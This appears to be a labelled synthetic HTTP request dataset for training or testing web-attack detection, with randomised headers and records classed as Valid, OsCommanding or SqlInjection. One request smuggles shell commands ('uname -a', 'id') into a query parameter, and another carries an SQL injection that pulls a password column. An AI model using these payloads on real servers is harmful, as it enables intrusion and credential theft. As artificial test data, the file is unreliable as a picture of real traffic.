Cookie: VdhV=6795522;RgG=g2h2iifxooot7u0ed;YSbJ=6005000239;oHi= et1<;hNwmeeLsr=qQj.MXEpKgP
Cookie2: $Version="7"
Date: Wed, 21 Nov 07 03:12:07 CET
ETag: "mkzxxIB4zBdH_.L3@amL"
Expect: 100-continue
From: 2uses@EiiTw.cz
If-Modified-Since: Thu, 15 Sep 05 08:13:00 GMT
If-Unmodified-Since: Fri, 05 Aug 05 17:16:06 UTC
If-Match: "@jNMF3BODQNxCXCC"
If-None-Match: "9DkB@xNJ@ez1aUxtqg"
If-Range: Wed, 26 Apr 06 17:21:34 CET
Max-Forwards: 520
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="eLtokse"
Authorization: NTLM aWFnbmV5bkloZWlocWUyZXNpaUpoMDZ1aWJlYXRsU2hlYw==
Range: -9083,20196-
Referer: /raaon/touot/rEadgoi/tsme.dll
TE: chunked;q=0.8,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.8 (Machintosh; U; PPC Mac OS X 8.1; ms-Nd; rv:4.3.6) Gecko/03885999
UA-CPU: StrongARM
UA-Disp: 0718,4997,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 747x4906
Via: 2.6 www.Taiko1ee.html, 6.4 40.154.60.138:0
Transfer-Encoding: deflate
Upgrade: oiz/5.7, 4Whet/4.7, sdili/7.8
Warning: 810 233.40.240.2:75910 "hppilonufanrr5o" "Tue, 05 Oct 04 06:33:59 UTC"
X-Forwarded-For: 180.126.109.12
X-Serial-Number: 02500062912801761
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13658
Start - Id: 24962
class: Valid
GET /sdfieaotunn/e0B/fxgHXpJ8F.swf?CPNM-fV7at=sa5g6Ew&hp7xndp=62665233&2gEpedbEdd3=w%3Efrb&6E__ZWQK_C=3odadmin%5CnLg%3Dhf&ZJi4FM=oi6er&L@PxtermsRs0nph-gm=boot.inieEce68t HTTP/1.1
Host: 44.39.199.68:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.8, compress, gzip, deflate, identity;q=0.5
Accept-Language: ttraeb-grg;q=0.5, hddffo-sEvIf5uS;q=0.6, e9-qr0t, tOen-etReeo
Cache-Control: max-stale=6924
Client-ip: 29.75.79.23
Cookie: ocmnnnnnph=215690;shEthh=462;gazooatn=bui2shdropb;mdnsriebIuBr6i=d tUadminapRvaaeu(ekecopys%
Cookie2: $Version="472"
Date: Sat, 25 Feb 06 02:13:20 UTC
ETag: W/"TwUFugKiaNsse5Cr"
Expect: 100-continue
From: iefmllR@anati.de
If-Modified-Since: Thu, 23 Feb 06 07:15:48 CET
If-Unmodified-Since: Sat, 20 Jan 07 19:25:36 GMT
If-Match: *
If-None-Match: "6q7fPJucTdIQXOl@fAr"
If-Range: *
Max-Forwards: 08
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM bmRzUmZ0b3RudnltbmJ5bXRqdTN0c3N1dTRON3lFaWVzb2k=
Authorization: NTLM Y2JhbGU1a2ltdW4waXdZb3JvcmFhaWxhNmJzZWFvaXRUczFveWlyQW5lZWhpZWVq
Range: -652846
Referer: http://www.eeNhdje.de/tctt1/kydh.html
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/5.7 (X11; U; Linux i386 3.4; on-ia; rv:3.2.4) Gecko/96215583
UA-CPU: PowerPC
UA-Disp: 028,484,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 778x801
Via: 2.1 8.92.126.146
Transfer-Encoding: gzip
Upgrade: 3bda/0.6, httrt3/8.5, bqt/6.9
Warning: 586 www.xoesS.jpg "tereeuOoER" "Sun, 31 Oct 04 12:03:58 GMT"
X-Forwarded-For: 86.74.11.156
X-Serial-Number: 2466804840974150
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24962
Start - Id: 33715
class: Valid
PUT /seirrngidyek99h/XYxb5fPNmochawSGP/svnI3_.iOnsvKaERhdH/rc7o5Cyk9KA/yplsEw/KEuOQC/ea.exe? HTTP/1.1
Content-Length: 114
Content-Language: n,evhcEitn
Content-Encoding: gzip
Content-Location: http://www.6uiell1e.biz/cp2ehg.php4
Content-MD5: ZWVvRHIxbzJtdDZyM0lkcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 28 Nov 09 03:40:59 CET
Last-Modified: Sun, 09 Oct 05 21:12:54 UTC
Host: www.omg3.uk:3008
Connection: close
Accept: image/jpeg, image/*;q=0.2, audio/*;q=0.5
Accept-Charset: windows-1258, big5;q=0.8, windows-1253;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: xye='r'
Client-ip: 16.66.77.9
Cookie: tt=aSi;sh_l.=179
Cookie2: $Version="4"
Date: Sat, 22 Sep 07 06:28:22 GMT
ETag: "bTqZSANPD9JFwK-ZR"
Expect: oM4iit=9tedi
From: eSwnhmt9@baaeh4uleA.net
If-Modified-Since: Tue, 03 Feb 09 16:16:16 UTC
If-Unmodified-Since: Tue, 20 Jun 06 07:29:27 CET
If-Match: *
If-None-Match: *
If-Range: "UsD8dWGdf8TtOoe-"
Max-Forwards: 29
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=ubkliie
Authorization: NTLM ZWJqZ3Bxc2RwaWVxZXJya28zRWVtcTFnaWV0NHJlaGR3bmNuMWF4
Range: 521419-715172,4927-26503,-3630
Referer: /ggna/5ehdE.zip
TE: trailers
Trailer: If-Modified-Since
User-Agent: o-tYHN1 http://www.ihiT0gb.biz
UA-CPU: x86
UA-Disp: 9133,083,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 520x205
Via: 9.5 www.lseetS.shtml
Transfer-Encoding: compress
Upgrade: ricefc/1.7, det/8.3, 4ue/4.8
Warning: 169 www.deqz.htm:7727 "bhneliecthdnon3n6p" 
X-Forwarded-For: 145.242.152.101
X-Serial-Number: 695598853636
----: --------------------------------------
~~~~~: ~~~~~~~~~~

h0up2c=tcy&pso-u0JkHQN4k=ee&ot=78983477&tPweehc=4&od=618943714&iuino=561&ldaerc2iaefsl=sformnulltyr\i|havingmx

End - Id: 33715
Start - Id: 43214
class: OsCommanding
GET /iaeK33-mgMqRBGhhsqoi/s-/azuosM.sUlD6/aDLFlrm8wQ/oqgcon.jpg?eix=+++++%3B+++++echo+%3B+++w+++%3B+++uname+++-a++++%3B+id&er4ci=e6oe+rtiE&u5sa=s&e5ryrtha9t=1519&hDT0ilA=SeiZct&z1kinAoaon=89075939&meurxj7aespnhe=gfMljSE-2qZ&nnisghote=8 HTTP/1.0
Host: www.0se9adh1.ch:80
Connection: oHtv
Accept: application/*;q=0.5, text/plain;q=0.0
Accept-Charset: iso-8859-5, x-mac-roman;q=0.0, iso-2022-kr, isiri-3342, ks_c_5601-1987;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 59.228.253.1
Cookie: 6hdrae7I=4036153164;vmtt=rhl8l';cwWnwbEg=3
Cookie2: $Version="350"
Date: Mon, 07 Dec 09 17:37:08 CET
ETag: W/"kIs-QqYDbLDJ8MmpxE"
Expect: 100-continue
From: oaiin@sieotlre.cz
If-Modified-Since: Thu, 18 Sep 08 10:08:03 CET
If-Unmodified-Since: Fri, 15 Aug 08 19:37:57 UTC
If-Match: "_Izm4xKtl.Xnnh24E5mY"
If-None-Match: *
If-Range: Wed, 18 Jan 06 20:47:38 CET
Max-Forwards: 064
MIME-Version: 7.7
Pragma: ta=bd
Proxy-Authorization: mfey smnSW=fltvk
Authorization: NTLM eW9ydkRnamhmYnNoam5kZWltdDNlbENvdG9yaGVuaXRIZWhudGhhNnJzb2lTZg==
Range: 2403-,12114-9,53-40810
Referer: http://www.aiofytcm.net/evm5.html
TE: deflate;q=0.9,gzip,trailers
Trailer: TE
User-Agent: rhfte/8.2
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 967x857
Via: 8.2 www.t5ieord.tiff, 4.8 www.dsasb.tiff, FTP/2.4 3.129.118.127:14711
Transfer-Encoding: lauvse; eychmig=l1athgp
Upgrade: pIh6l/8.2, tEst/3.2
Warning: 931 29.33.161.132:937 "tiriHq" "Sun, 23 Apr 06 11:58:11 UTC"
X-Forwarded-For: 195.218.20.4
X-Serial-Number: 3512760212193
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43214
Start - Id: 4391
class: Valid
POST /_T.KCN6wQ-systemNzBe/nElpgEPRxNHdRtT/sFBumKA@Nund2/rpImZZZ/eardrebbsle/er78heCGrnHzZpOw2/o75yaAt.htm? HTTP/1.1
Content-Length: 267
Content-Language: r,t
Content-Encoding: identity
Content-Location: http://www.oii5sat.uk/cwior.asmx
Content-MD5: N3RveWVzbm5zcmFvaTNlUA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 04 Feb 09 02:10:05 CET
Last-Modified: Wed, 17 Jun 09 11:04:28 UTC
Host: www.dmeoaneT.de
Connection: close
Accept: */*;q=0.9
Accept-Charset: iso-8859-8-i
Accept-Encoding: compress, compress;q=0.3, identity
Accept-Language: ode-mc8
Cache-Control: no-cache
Client-ip: 12.227.148.182
Cookie: uroraanteiepp=nQ5xwdigEezciu;mtAaaiuS=$hrht
Cookie2: $Version="93"
Date: Fri, 27 Jun 08 23:38:57 CET
ETag: "xl9oo@78lZOG_g@aFa_"
Expect: 100-continue
From: aetadtfe@elerak5o.uk
If-Modified-Since: Sun, 31 Aug 08 21:27:23 CET
If-Unmodified-Since: Fri, 23 Oct 09 12:39:41 GMT
If-Match: *
If-None-Match: "JAcdqBv733fqsShfz"
If-Range: "So7lBmcfvQ@9yQD"
Max-Forwards: 4056
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Basic aVdpNGxoQTp0NHMwaHNo
Authorization: NTLM ZG9HZWVueGFzZGp6eWNhcmNtc3Vlams3ZW9raTF0c1plcHRhdHJoMVRBY1NweA==
Range: -090
Referer: /1hloec/oaerst/tvln3.css
TE: chunked;q=0.7,trailers
Trailer: Upgrade
User-Agent: eVp6SfTA- http://www.awev.com
UA-CPU: Sparc
UA-Disp: 7270,8918,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 811x736
Via: HTTP/6.9 www.rlte.jpg, HTTP/1.6 8.13.108.117
Transfer-Encoding: deflate
Upgrade: cstua9/7.1, etzay/5.5, Dnexi/0.7, oro/7.7, Uf4e/4.1
Warning: 630 www.ld8md.shtml "Ovhsnhht" "Sat, 16 Sep 06 10:49:57 CET"
X-Forwarded-For: 4.233.209.13
X-Serial-Number: 5443838
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iesehnm0E=0&AobpllO5eklkt=<?7 doUteg?een&otzus&eprqo=[echL&3n7nnram7egdo=o?r&XF-A@iphtpass=t5oxdtwbr3nnekop&-LHWY_p3W=xH5ntM&n0se6=s2r&2rrtDle=@rtnx&4z4in=oFD&As4Tr=ouio&r5o9ae5eed=856876&rbrynelSt=ur6window.openJLoem <Z]n&hebtdw=zfte9fbbslse&83=083

End - Id: 4391
Start - Id: 29468
class: Valid
GET /ielLmTWn@4B7S/axqdSulnt1tu89EMy/a.f_LEoQvK/iioei8sioeeph3eg.js? HTTP/1.0
Host: 148.30.165.231
Connection: rmit
Accept: */*
Accept-Charset: windows-1250;q=0.6, iso-8859-15
Accept-Encoding: 
Accept-Language: nlarhmrh-ric;q=0.5, 9dE-craeenj5;q=0.0, oetaezo-9sHxcnse
Cache-Control: min-fresh=0
Client-ip: 47.233.141.164
Cookie: mk2=hn;ZqrhpXuH=7ummbsos;nw2eoaaf=24220098;ineiohus=57279551
Cookie2: $Version="749"
Date: Sat, 23 Aug 08 12:30:08 CET
ETag: "xLrsNsTOPTUionq"
Expect: sE4icgn
From: 3eefJz@tepiieo.org
If-Modified-Since: Wed, 30 Jun 04 23:45:22 CET
If-Unmodified-Since: Sat, 17 Apr 10 01:10:17 CET
If-Match: *
If-None-Match: "IEvQL-jb_Bg6H6cC"
If-Range: Thu, 02 Jun 05 19:34:57 UTC
Max-Forwards: 64
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: o4een vsotdtla=aeee
Authorization: Digest nonce
Range: 79719-,-15,5725-6080
Referer: /a0gmwn5s/eholke/teet.conf
TE: trailers
Trailer: From
User-Agent: mouunrdxlO/7.8.2
UA-CPU: Sparc
UA-Disp: 3759,7587,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6889x7208
Via: 3.2 187.167.192.13:960, FTP/3.7 252.143.94.50, HTTP/8.9 46.67.193.133
Transfer-Encoding: identity
Upgrade: nene/2.6
Warning: 434 www.3rmtd.png "yvs9tz" "Fri, 05 Aug 05 19:35:36 GMT"
X-Forwarded-For: 160.172.24.250
X-Serial-Number: 801273405
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29468
Start - Id: 22661
class: Valid
GET /1TseYe2moety/sNydr/gs/dqja2tjObd6etAtOfncf/7sadminand.sh?rtceucreaelVeea=e4k&tg5ney=819566&AtmsbsdttzA=9842&6tyZsbefafg=+dwf&YLAv3Wa=Tx0uftNaidz&NChT=eoawe5ebay%27sasrgw%3Fp&sRdueptedenitel=tisnaSon%29&nzirmourhR43=cgTE HTTP/1.0
Host: 118.70.32.103
Connection: close
Accept: text/*, application/x-tar
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: gN-eu;q=0.6, dttx5u9t-lics, lcdle-ehrsHh;q=0.2, ore1m-amOletpe;q=0.2, ri-en
Cache-Control: no-cache
Client-ip: 128.179.110.99
Cookie: TdhUnaE=58;ic6Nloh9octin=r\(gn
Cookie2: $Version="25"
Date: Fri, 10 Aug 07 08:00:17 UTC
ETag: W/"sUU9-82FSsrzTeyUyAbh"
Expect: 1Nwcd72l=Miceae;aIed
From: aeteiv@dttlm6ae.org
If-Modified-Since: Fri, 10 Mar 06 24:51:56 CET
If-Unmodified-Since: Tue, 09 Feb 10 07:42:21 UTC
If-Match: *
If-None-Match: "Cn9jKoh9vm_mDHo5uR"
If-Range: Wed, 09 Nov 05 03:32:45 CET
Max-Forwards: 6809
MIME-Version: 9.7
Pragma: 9pr6utsr=ecmsAet
Proxy-Authorization: go0M6u fnxd=4kel
Authorization: Basic dDdIZ3I6bzRoTnI=
Range: -708576,-3
Referer: http://rmbcli.fr/tbra/dcBeme/Dzhdimd/aaki3j.tar
TE: trailers
Trailer: Accept-Encoding
User-Agent: lria/1.3
UA-CPU: MIPS
UA-Disp: 1998,0662,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 265x421
Via: 0.4 www.itd8dmn.htm:1, 3.8 www.tHehiFo.htm, 0.6 www.sidenil.jpeg
Transfer-Encoding: compress
Upgrade: Ttn/9.0, tP0eRt/0.6, u4tias/8.0, alon/7.6, m9oa5l/9.7
Warning: 139 www.hnsi.shtml "stteZiesi" 
X-Forwarded-For: 23.196.24.89
X-Serial-Number: 12701556330524195
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22661
Start - Id: 29640
class: Valid
GET /eMo-C3CSI69/sZCaenWOzvTjcxQAJUos/pL2icENc2z4y9-7/Te3R.gif?oa=10&nteonhH8msbhti=el&sReedt4ei=issozzw&ilooarrmihsnuna=hriseozu%7C&Sa=LaehnwSeqr&aserbifsji=toceafocaOawp-hsL HTTP/1.0
Host: www.tie33adr.st
Connection: Tdba38z
Accept: application/zip;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: asw-tedtoa
Cache-Control: Td=brn
Client-ip: 180.238.202.202
Cookie: 9ttzKeKeJqgs=lRi;Seaeo=kotAeuA7apinVEa;@.evalus=walrtfhisit;9NrmU=05757204
Cookie2: $Version="56"
Date: Tue, 08 Aug 06 10:45:31 UTC
ETag: W/"YgrVF1W@QPY1ZGuG"
Expect: 100-continue
From: serlgoma@7stltqn9.org
If-Modified-Since: Thu, 25 Jun 09 15:45:28 CET
If-Unmodified-Since: Sat, 20 Jun 09 11:23:39 UTC
If-Match: "72xHNws@2B@2xZbBwWo6"
If-None-Match: *
If-Range: Sun, 28 Feb 10 02:54:01 UTC
Max-Forwards: 4
MIME-Version: 0.3
Pragma: lmeee=ao
Proxy-Authorization: Digest username="zohhys"
Authorization: S7bo efiVEo=c1i5a
Range: -146,1-593943,-3282
Referer: http://ge0ren.de/rpalEarh/s7ti/emalD520/eIfe.zip
TE: chunked,chunked;q=0.7
Trailer: Authorization
User-Agent: eyuHbi/2.0
UA-CPU: 68000
UA-Disp: 488,829,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8055x615
Via: odoovo/5.2 220.137.176.156, HTTP/2.8 www.dneOoi.css, HTTP/7.6 www.s3kyiH3o.jpg
Transfer-Encoding: oiejii
Upgrade: ltes/7.9
Warning: 858 13.245.63.112 "oeehhi" "Sat, 02 Sep 06 08:59:24 UTC"
X-Forwarded-For: 193.139.126.154
X-Serial-Number: 149051815209
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29640
Start - Id: 34373
class: Valid
PUT /aA0S5KH07nOh/tdhrldihnyext3up.exe? HTTP/1.0
Content-Length: 190
Content-Language: teldssih
Content-Encoding: gzip
Content-Location: /glddn/ehbs/ze3eao/usmhsi1.exe
Content-MD5: b2FzemlkaXNuZVZzaGRvdA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 20 Aug 04 08:48:20 GMT
Last-Modified: Mon, 29 Aug 05 13:44:42 UTC
Host: 161.86.248.129
Connection: close
Accept: image/gif, image/*
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.0
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 60.74.77.81
Cookie: i3=O$i
Cookie2: $Version="17"
Date: Tue, 11 Nov 08 18:27:51 GMT
ETag: "TUg1BVeJALDF8Nr"
Expect: eaLgnyhm
From: tvvees@4vk8nsor.be
If-Modified-Since: Fri, 07 Sep 07 05:10:14 GMT
If-Unmodified-Since: Sun, 20 Apr 08 05:51:22 CET
If-Match: "39y_-WljULcLiOV3AFb"
If-None-Match: "TVgP3TdBmdnii0z1Y"
If-Range: "8IfARhoN7UdhrTsdMOH"
Max-Forwards: 307
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM c29vb2ZTUGlmbWw0YWlvZXNIaG90YUhkb2phaW8ybTBVd2FjaQ==
Authorization: inyy gl5t=goed
Range: 4-
Referer: /eM6p/smRoces/nevsiwkr.jsp
TE: trailers,deflate;q=0.7,trailers
Trailer: If-Modified-Since
User-Agent: o7B_C5Gt http://www.svharrl.biz
UA-CPU: x86
UA-Disp: 404,187,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 015x732
Via: HTTP/7.3 81.236.24.209, 5.8 131.233.96.58, 3.2 143.31.15.245
Transfer-Encoding: identity
Upgrade: aa8el/9.2, rti/4.8, dpEae/4.2
Warning: 454 162.50.151.225 "tes99ltkugeiitg6tb" 
X-Forwarded-For: 107.108.232.99
X-Serial-Number: 71981796445551996576
----: -----------------
~~~~~: ~~~~~~~~~~~~

@M3zb7@f2=tri&Nobaoetontn=8704&wHPrmq=iiRy&ekZEmaoIeed=%elsi&slih8h4d5svwf=5&nartaiWhmrvex=rvyLVAr1p&n2sGkne6x7pnna=nsyHjnIGe&85cctSew7pAn=hnAWa0W_WpO1&2fNlcPVNpZCw=tFGa&aupDasW=9&ittja=io

End - Id: 34373
Start - Id: 22338
class: Valid
GET /nHuTckjT4Cev2/3G507/dqpmeggoib/nq5fCV1LRl/iBT5oe/s.auz/EIZfKNY.png?bs8Icd=aeesure0eraayumeA&keaEdr=0697&elledenyi1pit1=dio&pne=ans4nl&LUreplacelogyOM6rE=%24h7tm&sbrehhii=aamdpautoexeckelw9aree&iaee=60&o7d=%5Dadminc&taHsrct0wosiaa=tEoaTmge&msehzA=ttnstt2Por0styles&RAnu0nv_CFY5=eeAeInm44iat5+ HTTP/1.1
Host: www.xeggo.fr
Connection: u9sot9j
Accept: image/*;q=0.0
Accept-Charset: *
Accept-Encoding: identity;q=0.7, gzip, deflate;q=0.0, identity, gzip;q=0.4
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 186.185.1.249
Cookie: halmbg3slriti=tFrpfZOGy;oer0ck=2839427;mtzeag7tei=sdocumente dUp;lkXM=an(bree@'exec2I;dl6ut=eIRiHbmvrR
Cookie2: $Version="8"
Date: Mon, 13 Apr 09 21:56:25 UTC
ETag: W/"lHVx_e.CMm9IOvVHpR"
Expect: tatnb8n=ndennoq
From: iHpsna2i@sBsaOrTep.ch
If-Modified-Since: Sun, 22 Oct 06 05:14:49 UTC
If-Unmodified-Since: Thu, 23 Dec 04 02:40:45 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Apr 04 01:35:02 UTC
Max-Forwards: 98
MIME-Version: 9.4
Pragma: 6a4telz=dh4u
Proxy-Authorization: NTLM Y2lsaXZtY3JodGlycWRpbXJvbjNrUmVhaGRkbGxob2FzOXNkczI=
Authorization: Digest algorithm=owni
Range: 562648-,892394-
Referer: http://www.seewxaiu.be/OsRxm.dll
TE: deflate;q=0.5
Trailer: Accept-Language
User-Agent: Mozilla/6.7 (Machintosh; U; PPC 9.4; wu-tn; rv:2.7.7) Gecko/40725018
UA-CPU: 68000
UA-Disp: 6322,2576,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 254x8392
Via: aeasy/5.7 www.1isrooer.css, FTP/3.8 www.sStTT.jpg, 6.8 www.dq1toiue.tiff
Transfer-Encoding: identity
Upgrade: ujhe/8.0, pws/9.8
Warning: 671 28.174.76.18 "cWdlqucSkne3oqeaa" "Tue, 12 Oct 04 20:29:33 CET"
X-Forwarded-For: 81.163.55.171
X-Serial-Number: 8809830
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22338
Start - Id: 9879
class: Valid
GET /nBng.htm?3ibetweenselect2O2=vperlneE&4tuEdtbtFesh=5275&ni6snebdwsoOtg=5941005&ufnu=ecSmye0%40l&oesscshtdnr=rcer+ewget+owteanid&qN6nia5aRw7sawn=35756&zr=deee&umo85Wtg=aan&aErdprEtau=7576&ydihciyyde=ieohias00li&aManvndhnn=c%3A9oealink%2Feee%3Ar%27iw%7Ew-h&ila=eNzmrp5zgQ HTTP/1.0
Host: 5.207.206.30
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, compress, compress, compress, deflate
Accept-Language: 1r-euE, oecua43-1aiHyisu, w3nef-lbnqttf;q=0.9
Cache-Control: max-age=39692
Client-ip: 2.83.32.9
Cookie: fbsTie6mt=19;rl=openhii8whfO;otmpXa=linko
Cookie2: $Version="8"
Date: Mon, 29 Jan 07 11:22:44 CET
ETag: "pQ0Csa_mPxVC_N2B9LUm"
Expect: 100-continue
From: vtou@ndnw.net
If-Modified-Since: Sat, 07 May 05 10:18:19 CET
If-Unmodified-Since: Wed, 22 Jun 05 17:57:34 GMT
If-Match: "vx32EqNzXR4.@IhWQf9"
If-None-Match: *
If-Range: *
Max-Forwards: 7613
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic eWZhbTp0dXRoNjU=
Authorization: Digest response="8E14937E2cA8d70470EdAb3B4C1ECE38"
Range: -41393,134251-41032
Referer: http://Eernetln.com/itwmus/2En7la.php3
TE: trailers,gzip,trailers
Trailer: TE
User-Agent: Mozilla/4.6 (Machintosh; U; Mac OS X 9.8; xm-ae; rv:2.3.9) Gecko/66477980
UA-CPU: MIPS
UA-Disp: 042,750,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4156x0641
Via: 0.7 www.Ytsptt.css
Transfer-Encoding: deflate
Upgrade: aeOM/4.3, cgaa2/5.1, rrmrae/9.0, ofH/5.5
Warning: 563 www.otrl.html:54051 "ecBsinbfo" "Wed, 01 Aug 07 21:20:22 CET"
X-Forwarded-For: 197.251.52.207
X-Serial-Number: 09946739061718
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9879
Start - Id: 17596
class: Valid
GET /wxnn_hbKvGZ/dlcwnenoRlhEmwecscew/ba@P/n_mQ0/Nraaua/seetmo0otxIj/e.Fdlb.htm?1ietnucmo=a2eA%24epositionsw5&9zueioiih68acye=9771342758&an=qhrTemos&ccveim2=Ae7WwniqAywe&ih1eCdo=s4O8rowx31&1eafraStc=msQdo87ikaT&i10eiwltesdPa=6&oshGiphnyai=3612&6lTOlru=53&mxbN4HtJv=uetp3iia HTTP/1.0
Host: 140.76.167.166
Connection: close
Accept: application/*
Accept-Charset: *;q=0.9
Accept-Encoding: deflate;q=0.6
Accept-Language: won7ZSks-ha9Aee;q=0.7, ret2aei-h
Cache-Control: no-transform
Client-ip: 184.146.61.183
Cookie: traabist4e=mM9nEaqA;UamMfNJl=509;te7m=neAereux3&fea2t;cvSD9pautoexecHRtd=83057530
Cookie2: $Version="35"
Date: Sat, 07 Aug 04 01:24:54 UTC
ETag: "hqAY8ZkzdZavpxsToOsK"
Expect: hLwe0l
From: e2mynsaw@nysLe.org
If-Modified-Since: Wed, 06 Jul 05 18:26:15 UTC
If-Unmodified-Since: Fri, 20 Jun 08 15:00:52 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 19
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM aWltYWZ2cmlpcmljZm1haTJuNjF0OW5zb2VlaWVlbmFkdnNvSG5uRGls
Authorization: shdae saAeoht=lripitia
Range: 65473-
Referer: http://www.gls8dh.gov/ishhk.fgf
TE: trailers,gzip,trailers
Trailer: Range
User-Agent: ezhtho (p2TbU@7yH-)
UA-CPU: 68000
UA-Disp: 611,8955,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 519x8664
Via: 9.7 7.157.181.151, FTP/9.5 www.3iios.js:2628, 5.0 181.26.114.202
Transfer-Encoding: gzip
Upgrade: onh/7.2, dOlusn/1.5, hyh5C/9.3
Warning: 712 223.93.147.43 "mgu5s9ciwimaaiteyot" 
X-Forwarded-For: 200.24.82.209
X-Serial-Number: 607664307
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17596
Start - Id: 16427
class: Valid
GET /tv9jjf_KNsZ9xx/tfeaciis/ArW/Ysam4rfSrtIFCC5/nDdER24u5gz_-H4P.hj/rsh1kHwtr/r9dpyl2V/h9rlCwr5bkdSg-/tLm/ssat9ibtlttKoss/tsItvusp/eshirenatoTm1tmxdm.htm? HTTP/1.1
Host: www.oOutnm1.ch
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip, deflate, identity;q=0.2, compress;q=0.9
Accept-Language: ra-o, stqirg-e9we4o, nh-4db
Cache-Control: max-age=2387
Client-ip: 119.92.125.222
Cookie: z4tttNebeyAxt=8862;ifkxgtfpst=590453;oyo=t4afetc;rfdtonUyuq=ndQZxak;tT=097;rs=hdsi&i/gf GH|
Cookie2: $Version="734"
Date: Mon, 10 Apr 06 20:30:33 CET
ETag: "Mksr4AKBKcUUa46Gpw3P"
Expect: 100-continue
From: Sgspznl@eul4hW.net
If-Modified-Since: Thu, 17 Jun 04 15:54:26 GMT
If-Unmodified-Since: Wed, 28 Dec 05 23:37:27 UTC
If-Match: *
If-None-Match: "aH5Ysugv0C4lVtOjKUIR"
If-Range: "Aod7uEUXBBt.J@P"
Max-Forwards: 44
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic c3NlaXMwZ2U6c3VyTQ==
Range: -9,903164-,-40
Referer: http://fiSqe9r.it/earlu/dils/gtnt.wmn
TE: trailers,deflate;q=0.9
Trailer: Host
User-Agent: Mozilla/7.3 (compatible; Konqueror/0.6; WinNT; tehh2tspee)
UA-CPU: StrongARM
UA-Disp: 227,815,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 238x9595
Via: HTTP/2.3 www.o2nvea.css:1611
Transfer-Encoding: identity
Upgrade: pom/4.4, bephn/1.8, ozrlG/0.2, ahr/9.6, ib30/7.5
Warning: 421 141.32.227.122 "neei3Elooa" "Sun, 21 Sep 08 19:22:11 CET"
X-Forwarded-For: 150.85.0.128
X-Serial-Number: 493178
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16427
Start - Id: 41912
class: SqlInjection
GET /eC0FHXC/3IOpELp/ddcrsSuhteye/drtboosA2t1e3al7et/an/Ma0UP4H@TLb/ZAkPGq7G0eWiu/AhnTlno9dHe8aeT/otiemsngwntro.msf?lhsD0ueba=23&gl=%27%3B++++begin+declare+++++%40ret+++varchar%288000%29+set++%40ret%3D%27%3A%27++select++%40ret%3D%40ret%2B%27++++%27%2Boamghqh%2B%27%2F%27%2Bpassword++++from+++toiyie+++++where+++++f9ns%3E%40ret+++++select+%40ret+as+ret+into+foo+++end--&8es=hincludetr%3Cd%3D%5Ctelnetlo&r3n=ssfhawttmtwpb4O9lr HTTP/1.1
Host: www.DEb55aSirn.ch:80
Connection: 8nSlic
Accept: */*;q=0.7
Accept-Charset: hz-gb-2312;q=0.5, iso-8859-8, iso-8859-8;q=0.1
Accept-Encoding: 
Accept-Language: *
